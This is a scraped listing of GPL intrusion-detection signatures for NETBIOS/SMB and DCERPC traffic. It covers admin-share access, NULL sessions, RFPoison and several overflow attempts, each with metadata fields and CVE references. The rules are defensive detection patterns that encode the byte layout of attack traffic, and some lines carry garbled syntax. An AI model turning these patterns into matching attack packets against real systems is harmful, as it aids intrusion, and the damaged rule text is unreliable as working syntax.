Creation date : 2010-09-23

Last modified date : 2010-09-23

Rev version : 4

Category : NETBIOS

Severity : Not defined

Ruleset : GPL

Malware Family : Not defined

Type : SID

Performance Impact : Not defined

2103242

alert tcp $EXTERNAL_NET any -> $HOME_NET 139 (msg:"GPL NETBIOS SMB irot unicode bind attempt"; flow:established,to_server; content:"|00|"; depth:1; content:"|FF|SMB%"; within:5; distance:3; byte_test:1,&,128,6,relative; content:"&|00|"; within:2; distance:56; content:"|5C 00|P|00|I|00|P|00|E|00 5C 00 00 00|"; distance:4; nocase; byte_jump:2,-17,relative,from_beginning,little; isdataat:4,relative; content:"|05|"; byte_test:1,!&,16,3,relative; content:"|0B|"; within:1; distance:1; content:"|9E E7 B9|R=|CE 11 AA A1 00 00|i|01 29|?»; within:16; distance:29; flowbits:set,smb.tree.bind.irot; flowbits:noalert; classtype:protocol-command-decode; sid:2103242; rev:4; metadata:created_at 2010_09_23, updated_at 2010_09_23;)
`

Name : SMB irot unicode bind attempt

Attack target : Not defined

Description : Not defined

Tags : Not defined

Affected products : Not defined

Alert Classtype : protocol-command-decode

URL reference : Not defined

CVE reference : Not defined

Creation date : 2010-09-23

Last modified date : 2010-09-23

Rev version : 4

Category : NETBIOS

Severity : Not defined

Ruleset : GPL

Malware Family : Not defined

Type : SID

Performance Impact : Not defined

2103243

alert tcp $EXTERNAL_NET any -> $HOME_NET 139 (msg:"GPL NETBIOS SMB irot unicode little endian bind attempt"; flow:established,to_server; content:"|00|"; depth:1; content:"|FF|SMB%"; within:5; distance:3; byte_test:1,&,128,6,relative; content:"&|00|"; within:2; distance:56; content:"|5C 00|P|00|I|00|P|00|E|00 5C 00 00 00|"; distance:4; nocase; byte_jump:2,-17,relative,from_beginning,little; isdataat:4,relative; content:"|05|"; byte_test:1,&,16,3,relative; content:"|0B|"; within:1; distance:1; content:"|9E E7 B9|R=|CE 11 AA A1 00 00|i|01 29|?»; within:16; distance:29; flowbits:set,smb.tree.bind.irot; flowbits:noalert; classtype:protocol-command-decode; sid:2103243; rev:4; metadata:created_at 2010_09_23, updated_at 2010_09_23;)
`

Name : SMB irot unicode little endian bind attempt

Attack target : Not defined

Description : Not defined

Tags : Not defined

Affected products : Not defined

Alert Classtype : protocol-command-decode

URL reference : Not defined

CVE reference : Not defined

Creation date : 2010-09-23

Last modified date : 2010-09-23

Rev version : 4

Category : NETBIOS

Severity : Not defined

Ruleset : GPL

Malware Family : Not defined

Type : SID

Performance Impact : Not defined

2103100

alert tcp $EXTERNAL_NET any -> $HOME_NET 139 (msg:"GPL NETBIOS SMB llsrpc unicode bind attempt"; flow:established,to_server; content:"|00|"; depth:1; content:"|FF|SMB%"; within:5; distance:3; byte_test:1,&,128,6,relative; content:"&|00|"; within:2; distance:56; content:"|5C 00|P|00|I|00|P|00|E|00 5C 00 00 00|"; distance:4; nocase; byte_jump:2,-17,relative,from_beginning,little; content:"|05|"; distance:4; within:1; byte_test:1,!&,16,3,relative; content:"|0B|"; within:1; distance:1; content:"@|FD|,4l<|CE 11 A8 93 08 00|+.|9C|m"; within:16; distance:29; flowbits:set,smb.tree.bind.llsrpc; classtype:protocol-command-decode; sid:2103100; rev:4; metadata:created_at 2010_09_23, updated_at 2010_09_23;)

Name : SMB llsrpc unicode bind attempt

Attack target : Not defined

Description : Not defined

Tags : Not defined

Affected products : Not defined

Alert Classtype : protocol-command-decode

URL reference : Not defined

CVE reference : Not defined

Creation date : 2010-09-23

Last modified date : 2010-09-23

Rev version : 4

Category : NETBIOS

Severity : Not defined

Ruleset : GPL

Malware Family : Not defined

Type : SID

Performance Impact : Not defined

2103091

#alert tcp $EXTERNAL_NET any -> $HOME_NET 139 (msg:"GPL NETBIOS SMB llsrpc unicode create tree attempt"; flow:established,to_server; flowbits:isset,smb.tree.connect.ipc; content:"|00|"; depth:1; content:"|FF|SMB|A2|"; within:5; distance:3; byte_test:1,&,128,6,relative; content:"|5C 00|l|00|l|00|s|00|r|00|p|00|c|00 00 00|"; within:16; distance:78; nocase; classtype:protocol-command-decode; sid:2103091; rev:5; metadata:created_at 2010_09_23, updated_at 2010_09_23;)

Name : SMB llsrpc unicode create tree attempt

Attack target : Not defined

Description : Not defined

Tags : Not defined

Affected products : Not defined

Alert Classtype : protocol-command-decode

URL reference : Not defined

CVE reference : Not defined

Creation date : 2010-09-23

Last modified date : 2010-09-23

Rev version : 5

Category : NETBIOS

Severity : Not defined

Ruleset : GPL

Malware Family : Not defined

Type : SID

Performance Impact : Not defined

2103101

alert tcp $EXTERNAL_NET any -> $HOME_NET 139 (msg:"GPL NETBIOS SMB llsrpc unicode little endian bind attempt"; flow:established,to_server; content:"|00|"; depth:1; content:"|FF|SMB%"; within:5; distance:3; byte_test:1,&,128,6,relative; content:"&|00|"; within:2; distance:56; content:"|5C 00|P|00|I|00|P|00|E|00 5C 00 00 00|"; distance:4; nocase; byte_jump:2,-17,relative,from_beginning,little; content:"|05|"; distance:4; within:1; byte_test:1,&,16,3,relative; content:"|0B|"; within:1; distance:1; content:"@|FD|,4l<|CE 11 A8 93 08 00|+.|9C|m"; within:16; distance:29; flowbits:set,smb.tree.bind.llsrpc; classtype:protocol-command-decode; sid:2103101; rev:4; metadata:created_at 2010_09_23, updated_at 2010_09_23;)

Name : SMB llsrpc unicode little endian bind attempt

Attack target : Not defined

Description : Not defined

Tags : Not defined

Affected products : Not defined

Alert Classtype : protocol-command-decode

URL reference : Not defined

CVE reference : Not defined

Creation date : 2010-09-23

Last modified date : 2010-09-23

Rev version : 4

Category : NETBIOS

Severity : Not defined

Ruleset : GPL

Malware Family : Not defined

Type : SID

Performance Impact : Not defined

2102938

alert tcp $EXTERNAL_NET any -> $HOME_NET 445 (msg:"GPL NETBIOS SMB-DS NDdeSetTrustedShareW overflow attempt"; flow:established,to_server; flowbits:isset,smb.tree.bind.nddeapi; content:"|00|"; depth:1; content:"|FF|SMB%"; within:5; distance:3; byte_test:1,!&,128,6,relative; content:"&|00|"; within:2; distance:56; content:"|5C|PIPE|5C 00|"; distance:4; nocase; byte_jump:2,-10,relative,from_beginning; content:"|05|"; distance:4; within:1; byte_test:1,&,16,3,relative; content:"|00|"; within:1; distance:1; content:"|00 0C|"; within:2; distance:19; isdataat:256,relative; content:!"|00|"; within:256; distance:12; reference:bugtraq,11372; reference:cve,2004-0206; classtype:attempted-admin; sid:2102938; rev:6; metadata:created_at 2010_09_23, updated_at 2010_09_23;)

Name : SMB-DS NDdeSetTrustedShareW overflow attempt

Attack target : Not defined

Description : Not defined

Tags : Not defined

Affected products : Not defined

Alert Classtype : attempted-admin

URL reference : bugtraq,11372|cve,2004-0206

CVE reference : Not defined

Creation date : 2010-09-23

Last modified date : 2010-09-23

Rev version : 6

Category : NETBIOS

Severity : Not defined

Ruleset : GPL

Malware Family : Not defined

Type : SID

Performance Impact : Not defined

2102949

alert tcp $EXTERNAL_NET any -> $HOME_NET 445 (msg:"GPL NETBIOS SMB-DS NDdeSetTrustedShareW unicode little endian overflow attempt"; flow:established,to_server; flowbits:isset,smb.tree.bind.nddeapi; content:"|00|"; depth:1; content:"|FF|SMB%"; within:5; distance:3; byte_test:1,&,128,6,relative; content:"&|00|"; within:2; distance:56; content:"|5C 00|P|00|I|00|P|00|E|00 5C 00 00 00|"; distance:4; nocase; byte_jump:2,-10,relative,from_beginning; content:"|05|"; distance:4; within:1; byte_test:1,!&,16,3,relative; content:"|00|"; within:1; distance:1; content:"|0C 00|"; within:2; distance:19; isdataat:512,relative; content:!"|00 00|"; within:512; distance:12; reference:bugtraq,11372; reference:cve,2004-0206; classtype:attempted-admin; sid:2102949; rev:7; metadata:created_at 2010_09_23, updated_at 2010_09_23;)

Name : SMB-DS NDdeSetTrustedShareW unicode little endian overflow attempt

Attack target : Not defined

Description : Not defined

Tags : Not defined

Affected products : Not defined

Alert Classtype : attempted-admin

URL reference : bugtraq,11372|cve,2004-0206

CVE reference : Not defined

Creation date : 2010-09-23

Last modified date : 2010-09-23

Rev version : 7

Category : NETBIOS

Severity : Not defined

Ruleset : GPL

Malware Family : Not defined

Type : SID

Performance Impact : Not defined

2103168

alert tcp $EXTERNAL_NET any -> $HOME_NET 445 (msg:"GPL NETBIOS SMB-DS msqueue bind attempt"; flow:established,to_server; content:"|00|"; depth:1; content:"|FF|SMB%"; within:5; distance:3; byte_test:1,!&,128,6,relative; content:"&|00|"; within:2; distance:56; content:"|5C|PIPE|5C 00|"; distance:4; nocase; byte_jump:2,-17,relative,from_beginning,little; content:"|05|"; distance:4; within:1; byte_test:1,!&,16,3,relative; content:"|0B|"; within:1; distance:1; content:"|B0 01|R|97 CA|Y|D0 11 A8 D5 00 A0 C9 0D 80|Q"; within:16; distance:29; flowbits:set,smb.tree.bind.msqueue; flowbits:noalert; reference:cve,2003-0995; reference:url,www.eeye.com/html/Research/Advisories/AD20030910.html; reference:url,www.microsoft.com/technet/security/bulletin/MS03-026.mspx; classtype:protocol-command-decode; sid:2103168; rev:4; metadata:created_at 2010_09_23, updated_at 2010_09_23;)

Name : SMB-DS msqueue bind attempt

Attack target : Not defined

Description : Not defined

Tags : Not defined

Affected products : Not defined

Alert Classtype : protocol-command-decode

URL reference : cve,2003-0995|url,www.eeye.com/html/Research/Advisories/AD20030910.html|url,www.microsoft.com/technet/security/bulletin/MS03-026.mspx

CVE reference : Not defined

Creation date : 2010-09-23

Last modified date : 2010-09-23

Rev version : 4

Category : NETBIOS

Severity : Not defined

Ruleset : GPL

Malware Family : Not defined

Type : SID

Performance Impact : Not defined

2103169

alert tcp $EXTERNAL_NET any -> $HOME_NET 445 (msg:"GPL NETBIOS SMB-DS msqueue little endian bind attempt"; flow:established,to_server; content:"|00|"; depth:1; content:"|FF|SMB%"; within:5; distance:3; byte_test:1,!&,128,6,relative; content:"&|00|"; within:2; distance:56; content:"|5C|PIPE|5C 00|"; distance:4; nocase; byte_jump:2,-17,relative,from_beginning,little; content:"|05|"; distance:4; within:1; byte_test:1,&,16,3,relative; content:"|0B|"; within:1; distance:1; content:"|B0 01|R|97 CA|Y|D0 11 A8 D5 00 A0 C9 0D 80|Q"; within:16; distance:29; flowbits:set,smb.tree.bind.msqueue; flowbits:noalert; reference:cve,2003-0995; reference:url,www.eeye.com/html/Research/Advisories/AD20030910.html; reference:url,www.microsoft.com/technet/security/bulletin/MS03-026.mspx; classtype:protocol-command-decode; sid:2103169; rev:4; metadata:created_at 2010_09_23, updated_at 2010_09_23;)

Name : SMB-DS msqueue little endian bind attempt

Attack target : Not defined

Description : Not defined

Tags : Not defined

Affected products : Not defined

Alert Classtype : protocol-command-decode

URL reference : cve,2003-0995|url,www.eeye.com/html/Research/Advisories/AD20030910.html|url,www.microsoft.com/technet/security/bulletin/MS03-026.mspx

CVE reference : Not defined

Creation date : 2010-09-23

Last modified date : 2010-09-23

Rev version : 4

Category : NETBIOS

Severity : Not defined

Ruleset : GPL

Malware Family : Not defined

Type : SID

Performance Impact : Not defined

2100538

alert tcp $EXTERNAL_NET any -> $HOME_NET 139 (msg:"GPL NETBIOS SMB IPC$ unicode share access"; flow:established,to_server; content:"|00|"; depth:1; content:"|FF|SMBu"; within:5; distance:3; byte_test:1,&,128,6,relative; byte_jump:2,34,little,relative; content:"I|00|P|00|C|00 24 00 00 00|"; distance:2; nocase; flowbits:set,smb.tree.connect.ipc; classtype:protocol-command-decode; sid:2100538; rev:17; metadata:created_at 2010_09_23, updated_at 2010_09_23;)

Name : SMB IPC$ unicode share access

Attack target : Not defined

Description : Not defined

Tags : Not defined

Affected products : Not defined

Alert Classtype : protocol-command-decode

URL reference : Not defined

CVE reference : Not defined

Creation date : 2010-09-23

Last modified date : 2010-09-23

Rev version : 17

Category : NETBIOS

Severity : Not defined

Ruleset : GPL

Malware Family : Not defined

Type : SID

Performance Impact : Not defined

2100537

alert tcp $EXTERNAL_NET any -> $HOME_NET 139 (msg:"GPL NETBIOS SMB IPC$ share access"; flow:established,to_server; content:"|00|"; depth:1; content:"|FF|SMBu"; within:5; distance:3; byte_test:1,!&,128,6,relative; byte_jump:2,34,little,relative; content:"IPC|24 00|"; distance:2; nocase; flowbits:set,smb.tree.connect.ipc; classtype:protocol-command-decode; sid:2100537; rev:17; metadata:created_at 2010_09_23, updated_at 2010_09_23;)

Name : SMB IPC$ share access

Attack target : Not defined

Description : Not defined

Tags : Not defined

Affected products : Not defined

Alert Classtype : protocol-command-decode

URL reference : Not defined

CVE reference : Not defined

Creation date : 2010-09-23

Last modified date : 2010-09-23

Rev version : 17

Category : NETBIOS

Severity : Not defined

Ruleset : GPL

Malware Family : Not defined

Type : SID

Performance Impact : Not defined

2100536

alert tcp $EXTERNAL_NET any -> $HOME_NET 139 (msg:"GPL NETBIOS SMB D$ share access"; flow:established,to_server; content:"|00|"; depth:1; content:"|FF|SMBu"; within:5; distance:3; byte_test:1,!&,128,6,relative; byte_jump:2,34,little,relative; content:"D|24 00|"; distance:2; nocase; classtype:protocol-command-decode; sid:2100536; rev:13; metadata:created_at 2010_09_23, updated_at 2010_09_23;)

Name : SMB D$ share access

Attack target : Not defined

Description : Not defined

Tags : Not defined

Affected products : Not defined

Alert Classtype : protocol-command-decode

URL reference : Not defined

CVE reference : Not defined

Creation date : 2010-09-23

Last modified date : 2010-09-23

Rev version : 13

Category : NETBIOS

Severity : Not defined

Ruleset : GPL

Malware Family : Not defined

Type : SID

Performance Impact : Not defined

2100535

alert tcp $EXTERNAL_NET any -> $HOME_NET 139 (msg:"GPL NETBIOS SMB CD..."; flow:to_server,established; content:"|5C|...|00 00 00|"; reference:arachnids,337; classtype:attempted-recon; sid:2100535; rev:7; metadata:created_at 2010_09_23, updated_at 2010_09_23;)

Name : SMB CD…

Attack target : Not defined

Description : Not defined

Tags : Not defined

Affected products : Not defined

Alert Classtype : attempted-recon

URL reference : arachnids,337

CVE reference : Not defined

Creation date : 2010-09-23

Last modified date : 2010-09-23

Rev version : 7

Category : NETBIOS

Severity : Not defined

Ruleset : GPL

Malware Family : Not defined

Type : SID

Performance Impact : Not defined

2100534

alert tcp $EXTERNAL_NET any -> $HOME_NET 139 (msg:"GPL NETBIOS SMB CD.."; flow:to_server,established; content:"|5C|../|00 00 00|"; reference:arachnids,338; classtype:attempted-recon; sid:2100534; rev:7; metadata:created_at 2010_09_23, updated_at 2010_09_23;)

Name : SMB CD..

Attack target : Not defined

Description : Not defined

Tags : Not defined

Affected products : Not defined

Alert Classtype : attempted-recon

URL reference : arachnids,338

CVE reference : Not defined

Creation date : 2010-09-23

Last modified date : 2010-09-23

Rev version : 7

Category : NETBIOS

Severity : Not defined

Ruleset : GPL

Malware Family : Not defined

Type : SID

Performance Impact : Not defined

2100533

alert tcp $EXTERNAL_NET any -> $HOME_NET 139 (msg:"GPL NETBIOS SMB C$ share access"; flow:established,to_server; content:"|00|"; depth:1; content:"|FF|SMBu"; within:5; distance:3; byte_test:1,!&,128,6,relative; byte_jump:2,34,little,relative; content:"C|24 00|"; distance:2; nocase; content:!"IPC|24 00|"; within:5; distance:-5; nocase; classtype:protocol-command-decode; sid:2100533; rev:17; metadata:created_at 2010_09_23, updated_at 2010_09_23;)

Name : SMB C$ share access

Attack target : Not defined

Description : Not defined

Tags : Not defined

Affected products : Not defined

Alert Classtype : protocol-command-decode

URL reference : Not defined

CVE reference : Not defined

Creation date : 2010-09-23

Last modified date : 2010-09-23

Rev version : 17

Category : NETBIOS

Severity : Not defined

Ruleset : GPL

Malware Family : Not defined

Type : SID

Performance Impact : Not defined

2100532

alert tcp $EXTERNAL_NET any -> $HOME_NET 139 (msg:"GPL NETBIOS SMB ADMIN$ share access"; flow:established,to_server; content:"|00|"; depth:1; content:"|FF|SMBu"; within:5; distance:3; byte_test:1,!&,128,6,relative; byte_jump:2,34,little,relative; content:"ADMIN|24 00|"; distance:2; nocase; classtype:protocol-command-decode; sid:2100532; rev:14; metadata:created_at 2010_09_23, updated_at 2010_09_23;)

Name : SMB ADMIN$ share access

Attack target : Not defined

Description : Not defined

Tags : Not defined

Affected products : Not defined

Alert Classtype : protocol-command-decode

URL reference : Not defined

CVE reference : Not defined

Creation date : 2010-09-23

Last modified date : 2010-09-23

Rev version : 14

Category : NETBIOS

Severity : Not defined

Ruleset : GPL

Malware Family : Not defined

Type : SID

Performance Impact : Not defined

2100530

alert tcp $EXTERNAL_NET any -> $HOME_NET 139 (msg:"GPL NETBIOS NT NULL session"; flow:to_server,established; content:"|00 00 00 00|W|00|i|00|n|00|d|00|o|00|w|00|s|00| |00|N|00|T|00| |00|1|00|3|00|8|00|1"; reference:arachnids,204; reference:bugtraq,1163; reference:cve,2000-0347; classtype:attempted-recon; sid:2100530; rev:11; metadata:created_at 2010_09_23, updated_at 2010_09_23;)

Name : NT NULL session

Attack target : Not defined

Description : Not defined

Tags : Not defined

Affected products : Not defined

Alert Classtype : attempted-recon

URL reference : arachnids,204|bugtraq,1163|cve,2000-0347

CVE reference : Not defined

Creation date : 2010-09-23

Last modified date : 2010-09-23

Rev version : 11

Category : NETBIOS

Severity : Not defined

Ruleset : GPL

Malware Family : Not defined

Type : SID

Performance Impact : Not defined

2100529

alert tcp $EXTERNAL_NET any -> $HOME_NET 139 (msg:"GPL NETBIOS DOS RFPoison"; flow:to_server,established; content:"|5C 00 5C 00|*|00|S|00|M|00|B|00|S|00|E|00|R|00|V|00|E|00|R|00 00 00 00 00 01 00 00 00 01 00 00 00 00 00 00 00 FF FF FF FF 00 00 00 00|"; reference:arachnids,454; classtype:attempted-dos; sid:2100529; rev:8; metadata:created_at 2010_09_23, updated_at 2010_09_23;)

Name : DOS RFPoison

Attack target : Not defined

Description : Not defined

Tags : Not defined

Affected products : Not defined

Alert Classtype : attempted-dos

URL reference : arachnids,454

CVE reference : Not defined

Creation date : 2010-09-23

Last modified date : 2010-09-23

Rev version : 8

Category : NETBIOS

Severity : Not defined

Ruleset : GPL

Malware Family : Not defined

Type : SID

Performance Impact : Not defined

2102382

#alert tcp $EXTERNAL_NET any -> $HOME_NET 139 (msg:"GPL NETBIOS SMB Session Setup NTMLSSP asn1 overflow attempt"; flow:established,to_server; content:"|00|"; depth:1; content:"|FF|SMBs"; within:5; distance:3; byte_test:1,!&,128,6,relative; pcre:"/^.{27}/R"; byte_test:4,&,2147483648,21,relative,little; content:!"NTLMSSP"; within:7; distance:27; asn1:double_overflow, bitstring_overflow, relative_offset 27, oversize_length 2048; reference:bugtraq,9633; reference:bugtraq,9635; reference:cve,2003-0818; reference:nessus,12052; reference:nessus,12065; reference:url,www.microsoft.com/technet/security/bulletin/MS04-007.mspx; classtype:protocol-command-decode; sid:2102382; rev:22; metadata:created_at 2010_09_23, updated_at 2010_09_23;)

Name : SMB Session Setup NTMLSSP asn1 overflow attempt

Attack target : Not defined

Description : Not defined

Tags : Not defined

Affected products : Not defined

Alert Classtype : protocol-command-decode

URL reference : bugtraq,9633|bugtraq,9635|cve,2003-0818|nessus,12052|nessus,12065|url,www.microsoft.com/technet/security/bulletin/MS04-007.mspx

CVE reference : Not defined

Creation date : 2010-09-23

Last modified date : 2010-09-23

Rev version : 22

Category : NETBIOS

Severity : Not defined

Ruleset : GPL

Malware Family : Not defined

Type : SID

Performance Impact : Not defined

2102383

alert tcp $EXTERNAL_NET any -> $HOME_NET 445 (msg:"GPL NETBIOS SMB-DS Session Setup NTMLSSP asn1 overflow attempt"; flow:established,to_server; content:"|00|"; depth:1; content:"|FF|SMBs"; within:5; distance:3; byte_test:1,!&,128,6,relative; byte_test:4,&,2147483648,48,relative,little; content:!"NTLMSSP"; within:7; distance:54; asn1:double_overflow, bitstring_overflow, relative_offset 54, oversize_length 2048; reference:bugtraq,9633; reference:bugtraq,9635; reference:cve,2003-0818; reference:nessus,12052; reference:nessus,12065; reference:url,www.microsoft.com/technet/security/bulletin/MS04-007.mspx; classtype:protocol-command-decode; sid:2102383; rev:21; metadata:created_at 2010_09_23, updated_at 2010_09_23;)

Name : SMB-DS Session Setup NTMLSSP asn1 overflow attempt

Attack target : Not defined

Description : Not defined

Tags : Not defined

Affected products : Not defined

Alert Classtype : protocol-command-decode

URL reference : bugtraq,9633|bugtraq,9635|cve,2003-0818|nessus,12052|nessus,12065|url,www.microsoft.com/technet/security/bulletin/MS04-007.mspx

CVE reference : Not defined

Creation date : 2010-09-23

Last modified date : 2010-09-23

Rev version : 21

Category : NETBIOS

Severity : Not defined

Ruleset : GPL

Malware Family : Not defined

Type : SID

Performance Impact : Not defined

2103003

alert tcp $EXTERNAL_NET any -> $HOME_NET 445 (msg:"GPL NETBIOS SMB-DS Session Setup NTMLSSP unicode asn1 overflow attempt"; flow:established,to_server; content:"|00|"; depth:1; content:"|FF|SMBs"; within:5; distance:3; byte_test:1,&,128,6,relative; byte_test:4,&,2147483648,48,relative,little; content:!"NTLMSSP"; within:7; distance:54; asn1:double_overflow, bitstring_overflow, relative_offset 54, oversize_length 2048; reference:bugtraq,9633; reference:bugtraq,9635; reference:cve,2003-0818; reference:nessus,12052; reference:nessus,12065; reference:url,www.microsoft.com/technet/security/bulletin/MS04-007.mspx; classtype:protocol-command-decode; sid:2103003; rev:7; metadata:created_at 2010_09_23, updated_at 2010_09_23;)

Name : SMB-DS Session Setup NTMLSSP unicode asn1 overflow attempt

Attack target : Not defined

Description : Not defined

Tags : Not defined

Affected products : Not defined

Alert Classtype : protocol-command-decode

URL reference : bugtraq,9633|bugtraq,9635|cve,2003-0818|nessus,12052|nessus,12065|url,www.microsoft.com/technet/security/bulletin/MS04-007.mspx

CVE reference : Not defined

Creation date : 2010-09-23

Last modified date : 2010-09-23

Rev version : 7

Category : NETBIOS

Severity : Not defined

Ruleset : GPL

Malware Family : Not defined

Type : SID

Performance Impact : Not defined

2102403

#alert tcp $EXTERNAL_NET any -> $HOME_NET 139 (msg:"GPL NETBIOS SMB Session Setup AndX request unicode username overflow attempt"; flow:stateless; content:"|00|"; depth:1; content:"|FF|SMBs"; within:5; distance:3; byte_test:1,&,128,6,relative; pcre:"/^.{27}/sR"; byte_test:4,!&,2147483648,21,relative,little; content:!"|00 00|"; within:510; distance:29; reference:bugtraq,9752; reference:url,www.eeye.com/html/Research/Advisories/AD20040226.html; classtype:protocol-command-decode; sid:2102403; rev:7; metadata:created_at 2010_09_23, updated_at 2010_09_23;)

Name : SMB Session Setup AndX request unicode username overflow attempt

Attack target : Not defined

Description : Not defined

Tags : Not defined

Affected products : Not defined

Alert Classtype : protocol-command-decode

URL reference : bugtraq,9752|url,www.eeye.com/html/Research/Advisories/AD20040226.html

CVE reference : Not defined

Creation date : 2010-09-23

Last modified date : 2010-09-23

Rev version : 7

Category : NETBIOS

Severity : Not defined

Ruleset : GPL

Malware Family : Not defined

Type : SID

Performance Impact : Not defined

2102404

#alert tcp $EXTERNAL_NET any -> $HOME_NET 445 (msg:"GPL NETBIOS SMB-DS Session Setup AndX request unicode username overflow attempt"; flow:stateless; content:"|00|"; depth:1; content:"|FF|SMB"; within:4; distance:3; pcre:"/^(x75|x2d|x2f|x73|xa2|x2e|x24|x74)/sR"; byte_test:1,&,128,6,relative; content:"s"; depth:1; offset:39; byte_jump:2,0,little,relative; byte_test:4,!&,2147483648,21,relative,little; content:!"|00 00|"; within:510; distance:29; reference:bugtraq,9752; reference:url,www.eeye.com/html/Research/Advisories/AD20040226.html; classtype:protocol-command-decode; sid:2102404; rev:7; metadata:created_at 2010_09_23, updated_at 2010_09_23;)

Name : SMB-DS Session Setup AndX request unicode username overflow attempt

Attack target : Not defined

Description : Not defined

Tags : Not defined

Affected products : Not defined

Alert Classtype : protocol-command-decode

URL reference : bugtraq,9752|url,www.eeye.com/html/Research/Advisories/AD20040226.html

CVE reference : Not defined

Creation date : 2010-09-23

Last modified date : 2010-09-23

Rev version : 7

Category : NETBIOS

Severity : Not defined

Ruleset : GPL

Malware Family : Not defined

Type : SID

Performance Impact : Not defined

2103437

alert tcp $EXTERNAL_NET any -> $HOME_NET 445 (msg:"GPL NETBIOS SMB-DS CoGetInstanceFromFile andx attempt"; flow:established,to_server; flowbits:isset,dce.isystemactivator.bind; content:"|00|"; depth:1; content:"|FF|SMB"; within:4; distance:3; pcre:"/^(x75|x2d|x2f|x73|xa2|x2e|x24|x74)/sR"; byte_test:1,!&,128,6,relative; content:"%"; depth:1; offset:39; byte_jump:2,0,little,relative; content:"&|00|"; within:2; distance:29; content:"|5C|PIPE|5C 00|"; distance:4; nocase; byte_jump:2,-17,relative,from_beginning,little; isdataat:4,relative; content:"|05|"; byte_test:1,!&,16,3,relative; content:"|00|"; within:1; distance:1; content:"|00 04|"; within:2; distance:19; content:"|5C 5C|"; byte_test:4,>,256,6; classtype:protocol-command-decode; sid:2103437; rev:4; metadata:created_at 2010_09_23, updated_at 2010_09_23;)

Name : SMB-DS CoGetInstanceFromFile andx attempt

Attack target : Not defined

Description : Not defined

Tags : Not defined

Affected products : Not defined

Alert Classtype : protocol-command-decode

URL reference : Not defined

CVE reference : Not defined

Creation date : 2010-09-23

Last modified date : 2010-09-23

Rev version : 4

Category : NETBIOS

Severity : Not defined

Ruleset : GPL

Malware Family : Not defined

Type : SID

Performance Impact : Not defined

2103429

alert tcp $EXTERNAL_NET any -> $HOME_NET 139 (msg:"GPL NETBIOS SMB CoGetInstanceFromFile andx attempt"; flow:established,to_server; flowbits:isset,dce.isystemactivator.bind; content:"|00|"; depth:1; content:"|FF|SMB"; within:4; distance:3; pcre:"/^(x75|x2d|x2f|x73|xa2|x2e|x24|x74)/sR"; byte_test:1,!&,128,6,relative; content:"%"; depth:1; offset:39; byte_jump:2,0,little,relative; content:"&|00|"; within:2; distance:29; content:"|5C|PIPE|5C 00|"; distance:4; nocase; byte_jump:2,-17,relative,from_beginning,little; isdataat:4,relative; content:"|05|"; byte_test:1,!&,16,3,relative; content:"|00|"; within:1; distance:1; content:"|00 04|"; within:2; distance:19; content:"|5C 5C|"; byte_test:4,>,256,6; classtype:protocol-command-decode; sid:2103429; rev:5; metadata:created_at 2010_09_23, updated_at 2010_09_23;)

Name : SMB CoGetInstanceFromFile andx attempt

Attack target : Not defined

Description : Not defined

Tags : Not defined

Affected products : Not defined

Alert Classtype : protocol-command-decode

URL reference : Not defined

CVE reference : Not defined

Creation date : 2010-09-23

Last modified date : 2010-09-23

Rev version : 5

Category : NETBIOS

Severity : Not defined

Ruleset : GPL

Malware Family : Not defined

Type : SID

Performance Impact : Not defined

2103158

alert tcp $EXTERNAL_NET any -> $HOME_NET 135 (msg:"GPL NETBIOS DCERPC CoGetInstanceFromFile little endian overflow attempt"; flow:established,to_server; flowbits:isset,smb.tree.bind.msqueue; content:"|05|"; depth:1; byte_test:1,&,16,3,relative; content:"|00|"; offset:1;depth:1; content:"|01 00|";distance:19; within:2; byte_test:4,>,128,20,relative,little; reference:cve,2003-0995; reference:url,www.eeye.com/html/Research/Advisories/AD20030910.html; reference:url,www.microsoft.com/technet/security/bulletin/MS03-026.mspx; classtype:attempted-admin; sid:2103158; rev:6; metadata:created_at 2010_09_23, updated_at 2010_09_23;)

Name : DCERPC CoGetInstanceFromFile little endian overflow attempt

Attack target : Not defined

Description : Not defined

Tags : Not defined

Affected products : Not defined

Alert Classtype : attempted-admin

URL reference : cve,2003-0995|url,www.eeye.com/html/Research/Advisories/AD20030910.html|url,www.microsoft.com/technet/security/bulletin/MS03-026.mspx

CVE reference : Not defined

Creation date : 2010-09-23

Last modified date : 2010-09-23

Rev version : 6

Category : NETBIOS

Severity : Not defined

Ruleset : GPL

Malware Family : Not defined

Type : SID

Performance Impact : Not defined

2103159

alert tcp $EXTERNAL_NET any -> $HOME_NET 135 (msg:"GPL NETBIOS DCERPC CoGetInstanceFromFile overflow attempt"; flow:established,to_server; flowbits:isset,smb.tree.bind.msqueue; content:"|05|"; byte_test:1,!&,16,3,relative; content:"|00|"; within:1; distance:1; content:"|01 00|"; within:2; distance:19; byte_test:4,>,128,20,relative; reference:cve,2003-0995; reference:url,www.eeye.com/html/Research/Advisories/AD20030910.html; reference:url,www.microsoft.com/technet/security/bulletin/MS03-026.mspx; classtype:attempted-admin; sid:2103159; rev:4; metadata:created_at 2010_09_23, updated_at 2010_09_23;)

Name : DCERPC CoGetInstanceFromFile overflow attempt

Attack target : Not defined

Description : Not defined

Tags : Not defined

Affected products : Not defined

Alert Classtype : attempted-admin

URL reference : cve,2003-0995|url,www.eeye.com/html/Research/Advisories/AD20030910.html|url,www.microsoft.com/technet/security/bulletin/MS03-026.mspx

CVE reference : Not defined

Creation date : 2010-09-23

Last modified date : 2010-09-23

Rev version : 4

Category : NETBIOS

Severity : Not defined

Ruleset : GPL

Malware Family : Not defined

Type : SID

Performance Impact : Not defined

2103275

alert tcp $EXTERNAL_NET any -> $HOME_NET 135 (msg:"GPL NETBIOS DCERPC IActivation bind attempt"; flow:established,to_server; content:"|05|"; byte_test:1,!&,16,3,relative; content:"|0B|"; within:1; distance:1; content:"|B8|J|9F|M|1C|}|CF 11 86 1E 00| |AF|n|7C|W"; within:16; distance:29; flowbits:set,dce.isystemactivator.bind; classtype:protocol-command-decode; sid:2103275; rev:3; metadata:created_at 2010_09_23, updated_at 2010_09_23;)

Name : DCERPC IActivation bind attempt

Attack target : Not defined

Description : Not defined

Tags : Not defined

Affected products : Not defined

Alert Classtype : protocol-command-decode

URL reference : Not defined

CVE reference : Not defined

Creation date : 2010-09-23

Last modified date : 2010-09-23

Rev version : 3

Category : NETBIOS

Severity : Not defined

Ruleset : GPL

Malware Family : Not defined

Type : SID

Performance Impact : Not defined

2103276

